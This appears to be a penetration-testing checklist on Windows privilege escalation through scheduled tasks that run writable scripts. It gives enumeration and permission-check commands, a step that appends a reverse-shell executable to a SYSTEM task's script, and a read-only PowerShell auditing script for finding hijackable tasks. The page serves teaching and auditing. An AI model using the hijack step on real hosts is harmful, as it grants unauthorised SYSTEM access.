# Scheduled Tasks

### Overview

**Scheduled Tasks** can be abused for **local privilege escalation** when a task:

* Runs as a **high-privileged account** (SYSTEM / Administrator)
* Executes a **binary or script** that is **modifiable by a low-privileged user**
* Or has **weak task permissions** allowing modification

By **hijacking what the task executes**, an attacker can gain **code execution as SYSTEM or Administrator** when the task runs.

### Why this Works

A scheduled task consists of:

* **Trigger** (time, logon, event)
* **Action** (program/script)
* **Security context** (user it runs as)

Windows **does not validate file integrity or ownership** at runtime.\
If a low-privileged user can modify:

* The **executable**
* The **script**
* Or the **task definition**

then the task becomes a **privesc vector**.

### Prerequisites

1. Local Low-Privileged Access
2. Scheduled Task Runs as High Privilege
3. At least one of the following:
   * Writable executable/script
   * Writable directory in task path
   * Ability to modify task definition
   * Unquoted task path

### Check all Scheduled Tasks

```powershell
# PowerShell
Get-ScheduledTask

# Command line (schtasks works from both cmd and PowerShell)
schtasks
schtasks /query /fo LIST /v
schtasks /query /fo LIST /v /TN "<TASK_NAME>"
# Keep only the task name, the account it runs as and the action from the verbose listing
schtasks /query /fo LIST /v | findstr /i /C:"TaskName" /C:"Run As User" /C:"Task To Run"

# If the task is not listed, look at the 30 most recent Task Scheduler events and
# search them for a string related to the task (this operational log may be disabled
# by default, in which case it is empty)
Get-WinEvent -LogName 'Microsoft-Windows-TaskScheduler/Operational' -MaxEvents 30 |
    Where-Object { $_.Message -match '<String Related to the Task>' }
```

{% hint style="warning" %}
**There can be scheduled tasks that do not appear** when you run the above commands. This usually depends on **permissions, context, and how the task was created**.
{% endhint %}

### Steps

1. Identify the task and what it runs:

   ```cmd
   schtasks /query /tn BackupTask /v /fo LIST
   ```
2. Check the permissions on the script or binary (look for write or full access for your user or one of its groups):

   ```cmd
   :: -w lists only principals that have write access to the file
   accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1
   :: in the icacls output, (F), (M) or (W) next to your user or group means the file can be changed
   icacls C:\DevTools\CleanUp.ps1
   ```
3. Replace the script contents:

   ```cmd
   echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1
   ```
4. Wait for the scheduled task to run, which should trigger the reverse shell as SYSTEM.
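
To audit a whole host for the conditions listed under Prerequisites, instead of checking one task at a time as in steps 1 and 2, the following PowerShell script is an added example; it is not part of the original checklist. It assumes Windows 8 / Server 2012 or later (`Get-ScheduledTask`), that the group list in `$LowPrivGroups` matches the low-privileged user being audited, and that the tasks of interest are visible to the current user (the hidden tasks mentioned in the hint above are not enumerated). The function names `Test-LowPrivWritable`, `Get-ActionTargets` and `Find-HijackableTasks` are chosen here. The script only reads ACLs and task definitions; it changes nothing.

```powershell
# Added audit script (not from the original checklist): report enabled scheduled tasks that run
# under a privileged principal and whose action file, or the directory containing it, grants
# write rights to a low-privileged group, or whose executable path is unquoted and contains spaces.
# Assumptions: Get-ScheduledTask is available (Windows 8 / Server 2012+) and the tasks are visible
# to the current user; hidden or access-restricted tasks are not enumerated.

# Groups a low-privileged interactive user normally belongs to (assumed list; extend as needed).
$LowPrivGroups = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that let a principal change what the task ends up executing: writing to the file,
# creating files or folders in the directory, deleting (and so replacing) it, or retaking the ACL.
$WriteMask = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'

# Principals the checklist cares about; RunLevel 'Highest' covers administrators running elevated.
$PrivilegedIds = @('SYSTEM', 'NT AUTHORITY\SYSTEM', 'LOCAL SERVICE', 'NETWORK SERVICE',
                   'Administrators', 'BUILTIN\Administrators')

function Test-LowPrivWritable {
    # True when any Allow ACE on $Path gives one of $LowPrivGroups a right in $WriteMask.
    param([string]$Path)
    if ([string]::IsNullOrWhiteSpace($Path) -or -not (Test-Path -LiteralPath $Path)) { return $false }
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($rule in $acl.Access) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivGroups -notcontains $rule.IdentityReference.Value) { continue }
        if (([int]$rule.FileSystemRights -band [int]$WriteMask) -ne 0) { return $true }
    }
    return $false
}

function Get-ActionTargets {
    # Returns the executable of an Exec action plus any absolute Windows paths in its arguments
    # (for example the .ps1 behind "powershell.exe -File C:\DevTools\CleanUp.ps1").
    param([string]$Execute, [string]$Arguments)
    $exe = [Environment]::ExpandEnvironmentVariables($Execute).Trim()
    $quoted = $exe.StartsWith('"')
    $exe = $exe.Trim('"')
    if (-not [System.IO.Path]::IsPathRooted($exe)) {
        # Bare names such as powershell.exe are resolved through PATH, as the service would do.
        $app = Get-Command -Name $exe -CommandType Application -ErrorAction SilentlyContinue | Select-Object -First 1
        if ($app) { $exe = $app.Path }
    }
    $targets = @([pscustomobject]@{ Path = $exe; Unquoted = (-not $quoted -and $exe.Contains(' ')) })
    if ($Arguments) {
        $expanded = [Environment]::ExpandEnvironmentVariables($Arguments)
        foreach ($m in [regex]::Matches($expanded, '"(?<q>[A-Za-z]:\\[^"]+)"|(?<u>[A-Za-z]:\\[^\s"]+)')) {
            $p = if ($m.Groups['q'].Success) { $m.Groups['q'].Value } else { $m.Groups['u'].Value }
            $targets += [pscustomobject]@{ Path = $p; Unquoted = $false }
        }
    }
    return $targets
}

function Find-HijackableTasks {
    # Walks every enabled task and reports the conditions from the Prerequisites section.
    foreach ($task in (Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' })) {
        $principal = $task.Principal
        $id = if ($principal.UserId) { $principal.UserId } else { $principal.GroupId }
        if (-not (($PrivilegedIds -contains $id) -or ($principal.RunLevel -eq 'Highest'))) { continue }

        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # COM-handler / e-mail actions have no Execute property
            foreach ($target in (Get-ActionTargets -Execute $action.Execute -Arguments $action.Arguments)) {
                $findings = @()
                if (Test-LowPrivWritable -Path $target.Path) { $findings += 'file writable by low-priv group' }
                $parent = Split-Path -Path $target.Path -Parent
                if ($parent -and (Test-LowPrivWritable -Path $parent)) { $findings += 'directory writable by low-priv group' }
                if ($target.Unquoted) { $findings += 'unquoted executable path containing spaces' }
                if ($findings.Count -eq 0) { continue }
                [pscustomobject]@{
                    Task     = $task.TaskPath + $task.TaskName
                    RunsAs   = $id
                    RunLevel = $principal.RunLevel
                    Target   = $target.Path
                    Findings = ($findings -join '; ')
                }
            }
        }
    }
}

# Usage: run from the low-privileged account whose access you are auditing.
Find-HijackableTasks | Format-Table -AutoSize -Wrap
```

Rights are evaluated against the group names in `$LowPrivGroups`, not against the caller's token, so an ACL that grants write access to a specific user rather than a group is not flagged; for a single file the `accesschk`/`icacls` check in step 2 remains the authoritative answer. Anything this script reports is a task whose action file or directory should be owned by and writable only to administrators.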

